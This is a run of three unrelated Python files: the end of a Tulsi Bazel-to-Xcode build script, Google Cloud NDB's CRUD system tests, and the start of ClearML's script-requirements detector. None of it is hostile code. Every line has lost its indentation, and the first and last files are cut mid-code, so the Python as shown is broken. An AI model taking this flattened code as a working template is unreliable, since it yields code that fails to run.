err_msg = self.update_symbol_cache.UpdateUUID(uuid,
dsym_bundle_path,
arch)
if err_msg:
_PrintXcodeWarning('Attempted to save (uuid, dsym_bundle_path, arch) '
'to DBGShellCommands\' dSYM cache, but got error '
'\"%s\".' % err_msg)
return True
def _CleanExistingDSYMs(self):
"""Clean dSYM bundles that were left over from a previous build."""
output_dir = self.built_products_dir
output_dir_list = os.listdir(output_dir)
for item in output_dir_list:
if item.endswith('.dSYM'):
shutil.rmtree(os.path.join(output_dir, item))
def _PlistdSYMPaths(self, dsym_bundle_path):
"""Adds Plists to a given dSYM bundle to redirect DWARF data."""
# Retrieve the paths that we are expected to remap.
# Always include a direct path from the execroot to Xcode-visible sources.
source_maps = [self._ExtractTargetSourceMap()]
# Remap relative paths from the workspace root.
if self.normalized_prefix_map:
# Take the normalized path and map that to Xcode-visible sources.
source_maps.append(('./', self._NormalizePath(self.workspace_root)))
# Find the binaries within the dSYM bundle. UUIDs will match that of the
# binary it was based on.
dsym_binaries = self._DWARFdSYMBinaries(dsym_bundle_path)
if not dsym_binaries:
_PrintXcodeWarning('Could not find the binaries that the dSYM %s was '
'based on to determine DWARF binary slices to patch. '
'Debugging will probably fail.' % (dsym_bundle_path))
return 404
# Find the binary slice UUIDs with dwarfdump from each binary.
for source_binary_path in dsym_binaries:
returncode, uuid_info_found = self._UUIDInfoForBinary(source_binary_path)
if returncode:
return returncode
# Create a plist per UUID, each indicating a binary slice to remap paths.
for uuid, arch in uuid_info_found:
plist_created = self._CreateUUIDPlist(dsym_bundle_path,
uuid,
arch,
source_maps)
if not plist_created:
return 405
return 0
def _NormalizePath(self, path):
"""Returns paths with a common form, normalized with a trailing slash.
Args:
path: a file system path given in the form of a string.
Returns:
str: a normalized string with a trailing slash, based on |path|.
"""
return os.path.normpath(path) + os.sep
def _ExtractTargetSourceMap(self, normalize=True):
"""Extracts the source path as a tuple associated with the WORKSPACE path.
Args:
normalize: Defines if all paths should be normalized. Preferred for APIs
like DBGSourcePathRemapping and target.source-map but won't
work for the purposes of -fdebug-prefix-map.
Returns:
None: if an error occurred.
(str, str): a single tuple representing all absolute paths to source
files compiled by Bazel as strings ($0) associated with
the paths to Xcode-visible sources used for the purposes
of Tulsi debugging as strings ($1).
"""
# All paths route to the "workspace root" for sources visible from Xcode.
sm_destpath = self.workspace_root
if normalize:
sm_destpath = self._NormalizePath(sm_destpath)
# Add a redirection for the Bazel execution root, the path where sources
# are referenced by Bazel.
sm_execroot = self.bazel_exec_root
if normalize:
sm_execroot = self._NormalizePath(sm_execroot)
return (sm_execroot, sm_destpath)
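# Illustrative return value with normalize=True (hypothetical paths):
#   ('/private/var/tmp/_bazel_dev/1234/execroot/myapp/', '/Users/dev/myapp/')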
def _LinkTulsiToBazel(self, symlink_name, destination):
"""Links symlink_name (in project/.tulsi) to the specified destination."""
symlink_path = os.path.join(self.project_file_path,
'.tulsi',
symlink_name)
if os.path.islink(symlink_path):
os.unlink(symlink_path)
os.symlink(destination, symlink_path)
if not os.path.exists(symlink_path):
_PrintXcodeError(
'Linking %s to %s failed.' % (symlink_path, destination))
return -1
@staticmethod
def _SplitPathComponents(path):
"""Splits the given path into an array of all of its components."""
components = path.split(os.sep)
# Patch up the first component if path started with an os.sep
if not components[0]:
components[0] = os.sep
return components
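# For example, 'Payload/MyApp.app/Info.plist' splits to
# ['Payload', 'MyApp.app', 'Info.plist'], while an absolute
# '/Payload/MyApp.app' splits to ['/', 'Payload', 'MyApp.app'] (POSIX os.sep).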
def _RunSubprocess(self, cmd):
"""Runs the given command as a subprocess, returning (exit_code, output)."""
self._PrintVerbose('%r' % cmd, 1)
process = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
output, _ = process.communicate()
return (process.returncode, output)
def _PrintVerbose(self, msg, level=0):
if self.verbose > level:
_PrintUnbuffered(msg)
def main(argv):
build_settings = bazel_build_settings.BUILD_SETTINGS
if build_settings is None:
_Fatal('Unable to resolve build settings. Please report a Tulsi bug.')
return 1
return BazelBuildBridge(build_settings).Run(argv)
if __name__ == '__main__':
# Register the interrupt handler immediately in case we receive SIGINT while
# trying to acquire the lock.
signal.signal(signal.SIGINT, _InterruptHandler)
_LockFileAcquire(_LockFileCreate())
_logger = tulsi_logging.Logger()
logger_warning = tulsi_logging.validity_check()
if logger_warning:
_PrintXcodeWarning(logger_warning)
_timer = Timer('Everything', 'complete_build').Start()
_exit_code = main(sys.argv)
_timer.End()
sys.exit(_exit_code)
|
test_crud.py
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
System tests for Create, Update, Delete. (CRUD)
"""
import datetime
import functools
import operator
import os
import threading
import zlib
try:
from unittest import mock
except ImportError:
import mock
import pytest
import test_utils.system
from google.cloud import ndb
from google.cloud.ndb import _cache
from google.cloud.ndb import global_cache as global_cache_module
from tests.system import KIND, eventually
USE_REDIS_CACHE = bool(os.environ.get("REDIS_CACHE_URL"))
def _equals(n):
return functools.partial(operator.eq, n)
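# e.g. _equals(3) returns a predicate where _equals(3)(3) is True and
# _equals(3)(4) is False; it is used below with `eventually` to poll until a
# lookup returns the expected value.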
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
def test_retrieve_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
assert key.get() is entity
def test_retrieve_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
assert cache_key in cache_dict
patch = mock.patch("google.cloud.ndb._datastore_api._LookupBatch.add")
patch.side_effect = Exception("Shouldn't call this")
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_retrieve_entity_with_redis_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module.RedisCache.from_environment()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
assert global_cache.redis.get(cache_key) is not None
patch = mock.patch("google.cloud.ndb._datastore_api._LookupBatch.add")
patch.side_effect = Exception("Shouldn't call this")
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_not_found(ds_entity):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_nested_tasklet(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
@ndb.tasklet
def get_foo(key):
entity = yield key.get_async()
raise ndb.Return(entity.foo)
key = ndb.Key(KIND, entity_id)
assert get_foo(key).result() == 42
@pytest.mark.usefixtures("client_context")
def test_retrieve_two_entities_in_parallel(ds_entity):
entity1_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity1_id, foo=42, bar="none")
entity2_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity2_id, foo=65, bar="naan")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key1 = ndb.Key(KIND, entity1_id)
key2 = ndb.Key(KIND, entity2_id)
@ndb.tasklet
def get_two_entities():
entity1, entity2 = yield key1.get_async(), key2.get_async()
raise ndb.Return(entity1, entity2)
entity1, entity2 = get_two_entities().result()
assert isinstance(entity1, SomeKind)
assert entity1.foo == 42
assert entity1.bar == "none"
assert isinstance(entity2, SomeKind)
assert entity2.foo == 65
assert entity2.bar == "naan"
@pytest.mark.usefixtures("client_context")
def test_insert_entity(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
# Make sure strings are stored as strings in datastore
ds_entity = ds_client.get(key._key)
assert ds_entity["bar"] == "none"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_stored_name_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
bar = ndb.StringProperty(name="notbar")
entity = SomeKind(foo="something", bar="or other")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == "something"
assert retrieved.bar == "or other"
ds_entity = ds_client.get(key._key)
assert ds_entity["notbar"] == "or other"
@pytest.mark.usefixtures("client_context")
def test_insert_roundtrip_naive_datetime(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty()
entity = SomeKind(foo=datetime.datetime(2010, 5, 12, 2, 42))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 2, 42)
@pytest.mark.usefixtures("client_context")
def test_datetime_w_tzinfo(dispose_of, ds_client):
class timezone(datetime.tzinfo):
def __init__(self, offset):
self.offset = datetime.timedelta(hours=offset)
def utcoffset(self, dt):
return self.offset
def dst(self, dt):
return datetime.timedelta(0)
mytz = timezone(-4)
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty(tzinfo=mytz)
bar = ndb.DateTimeProperty(tzinfo=mytz)
entity = SomeKind(
foo=datetime.datetime(2010, 5, 12, 2, 42, tzinfo=timezone(-5)),
bar=datetime.datetime(2010, 5, 12, 2, 42),
)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 3, 42, tzinfo=mytz)
assert retrieved.bar == datetime.datetime(2010, 5, 11, 22, 42, tzinfo=mytz)
def test_parallel_threads(dispose_of, namespace):
client = ndb.Client(namespace=namespace)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def insert(foo):
with client.context(cache_policy=False):
entity = SomeKind(foo=foo, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
assert retrieved.bar == "none"
thread1 = threading.Thread(target=insert, args=[42], name="one")
thread2 = threading.Thread(target=insert, args=[144], name="two")
thread1.start()
thread2.start()
thread1.join()
thread2.join()
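# Note: each worker thread creates and enters its own client.context() inside
# insert(); ndb contexts are not shared across threads, which is why the
# context manager lives in the thread body rather than around the test.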
@pytest.mark.usefixtures("client_context")
def test_large_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty(compressed=True)
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_blob_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.BlobProperty(compressed=True)
foo = b"abc" * 100
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_compressed_property(
ds_entity_with_meanings,
):
class SomeKind(ndb.Model):
blob = ndb.BlobProperty()
value = b"abc" * 1000
compressed_value = zlib.compress(value)
entity_id = test_utils.system.unique_resource_id()
ds_entity_with_meanings(
{"blob": (22, compressed_value)},
KIND,
entity_id,
**{"blob": compressed_value}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.blob == value
@pytest.mark.usefixtures("client_context")
def test_large_pickle_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.PickleProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_key_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.KeyProperty()
key_value = ndb.Key("Whatevs", 123)
entity = SomeKind(foo=key_value)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == key_value
def test_insert_entity_with_caching(client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
with client_context.new(cache_policy=False).use():
# Sneaky. Delete entity out from under cache so we know we're getting
# cached copy.
key.delete()
eventually(key.get, _equals(None))
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
def test_insert_entity_with_global_cache(dispose_of, client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
assert not cache_dict
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
assert cache_key in cache_dict
entity.foo = 43
entity.put()
# This is py27 behavior. I can see a case being made for caching the
# entity on write rather than waiting for a subsequent lookup.
assert cache_key not in cache_dict
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_insert_entity_with_redis_cache(dispose_of, client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
global_cache = global_cache_module.RedisCache.from_environment()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
assert global_cache.redis.get(cache_key) is None
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
assert global_cache.redis.get(cache_key) is not None
entity.foo = 43
entity.put()
# This is py27 behavior. I can see a case being made for caching the
# entity on write rather than waiting for a subsequent lookup.
assert global_cache.redis.get(cache_key) is None
@pytest.mark.usefixtures("client_context")
def test_update_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_in_transaction(dispose_of):
commit_callback = mock.Mock()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def save_entity():
ndb.get_context().call_on_commit(commit_callback)
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
return key
key = ndb.transaction(save_entity)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
commit_callback.assert_called_once_with()
@pytest.mark.usefixtures("client_context")
def test_update_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def update_entity():
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
return key
key = ndb.transaction(update_entity)
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_parallel_transactions():
def task(delay):
@ndb.tasklet
def callback():
transaction = ndb.get_context().transaction
yield ndb.sleep(delay)
assert ndb.get_context().transaction == transaction
raise ndb.Return(transaction)
return callback
future1 = ndb.transaction_async(task(0.1))
future2 = ndb.transaction_async(task(0.06))
ndb.wait_all((future1, future2))
assert future1.get_result() != future2.get_result()
@pytest.mark.usefixtures("client_context")
def test_delete_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use():
assert key.get().foo == 42
assert cache_key in cache_dict
assert key.delete() is None
assert cache_key not in cache_dict
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
assert cache_dict[cache_key][0] == b"0"
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_delete_entity_with_redis_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
global_cache = global_cache_module.RedisCache.from_environment()
with client_context.new(global_cache=global_cache).use():
assert key.get().foo == 42
assert global_cache.redis.get(cache_key) is not None
assert key.delete() is None
assert global_cache.redis.get(cache_key) is None
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
assert global_cache.redis.get(cache_key) == b"0"
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
assert key.get().foo == 42 # not deleted until commit
ndb.transaction(delete_entity)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction_then_rollback(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
raise Exception("Spurious error")
with pytest.raises(Exception):
ndb.transaction(delete_entity)
assert key.get().foo == 42
@pytest.mark.usefixtures("client_context")
def test_allocate_ids():
class SomeKind(ndb.Model):
pass
keys = SomeKind.allocate_ids(5)
assert len(keys) == 5
for key in keys:
assert key.id()
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_get_by_id(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
entity = SomeKind.get_by_id(entity_id)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_get(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
ds_entity(KIND, name, foo=42)
entity = SomeKind.get_or_insert(name, foo=21)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_insert(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
entity = SomeKind.get_or_insert(name, foo=21)
dispose_of(entity._key._key)
assert entity.foo == 21
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_get_in_transaction(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
def do_the_thing():
ds_entity(KIND, name, foo=42)
return SomeKind.get_or_insert(name, foo=21)
entity = ndb.transaction(do_the_thing)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_structured_property(dispose_of):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
def test_insert_entity_with_structured_property_legacy_data(
client_context, dispose_of, ds_client
):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
with client_context.new(legacy_data=True).use():
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
ds_entity = ds_client.get(key._key)
assert ds_entity["foo"] == 42
assert ds_entity["bar.one"] == "hi"
assert ds_entity["bar.two"] == "mom"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity_id = test_utils.system.unique_resource_id()
ds_entity(
KIND, entity_id, **{"foo": 42, "bar.one": "hi", "bar.two": "mom"}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_repeated_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind, repeated=True)
entity_id = test_utils.system.unique_resource_id()
ds_entity(
KIND,
entity_id,
**{"foo": 42, "bar.one": ["hi", "hello"], "bar.two": ["mom", "dad"]}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar[0].one == "hi"
assert retrieved.bar[0].two == "mom"
assert retrieved.bar[1].one == "hello"
assert retrieved.bar[1].two == "dad"
assert isinstance(retrieved.bar[0], OtherKind)
assert isinstance(retrieved.bar[1], OtherKind)
@pytest.mark.usefixtures("client_context")
def test_insert_expando(dispose_of):
class SomeKind(ndb.Expando):
foo = ndb.IntegerProperty()
entity = SomeKind(foo=42)
entity.expando_prop = "exp-value"
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.expando_prop == "exp-value"
@pytest.mark.usefixtures("client_context")
def test_insert_polymodel(dispose_of):
class Animal(ndb.PolyModel):
one = ndb.StringProperty()
class Feline(Animal):
two = ndb.StringProperty()
class Cat(Feline):
three = ndb.StringProperty()
entity = Cat(one="hello", two="dad", three="i'm in jail")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved, Animal)
assert isinstance(retrieved, Cat)
assert retrieved.one == "hello"
assert retrieved.two == "dad"
assert retrieved.three == "i'm in jail"
@pytest.mark.usefixtures("client_context")
def test_insert_autonow_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
entity = SomeKind(foo="bar")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.created_at, datetime.datetime)
assert isinstance(retrieved.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_insert_nested_autonow_property(dispose_of):
class OtherKind(ndb.Model):
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
class SomeKind(ndb.Model):
other = ndb.StructuredProperty(OtherKind)
entity = SomeKind(other=OtherKind())
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.other.created_at, datetime.datetime)
assert isinstance(retrieved.other.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_uninitialized_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty(required=True)
entity = SomeKind()
with pytest.raises(ndb.exceptions.BadValueError):
entity.put()
@mock.patch(
"google.cloud.ndb._datastore_api.make_call",
mock.Mock(side_effect=Exception("Datastore shouldn't get called.")),
)
def test_crud_without_datastore(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
context.set_datastore_policy(False) # Don't use Datastore
key = ndb.Key(KIND, entity_id)
SomeKind(foo=42, bar="none", baz="night", _key=key).put()
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
key.delete()
assert key.get() is None
|
scriptinfo.py
|
import os
import sys
from copy import copy
from functools import partial
from tempfile import mkstemp
import attr
import logging
import json
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output, remove_user_pass_from_url
from ....backend_api import Session
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
_logger = get_logger("Repository Detection")
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
_max_requirements_size = 512 * 1024
_packages_remove_version = ('setuptools', )
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self, entry_point_filename=None):
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = self._remove_package_versions(
get_installed_pkgs_detail(), self._packages_remove_version)
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints',
'site-packages', 'dist-packages'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(
module_callback=ScriptRequirements.add_trains_used_packages, entry_point_filename=entry_point_filename)
return self.create_requirements_txt(reqs, local_pks)
except Exception:
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import boto3 # noqa: F401
modules.add('boto3', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from google.cloud import storage # noqa: F401
modules.add('google_cloud_storage', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
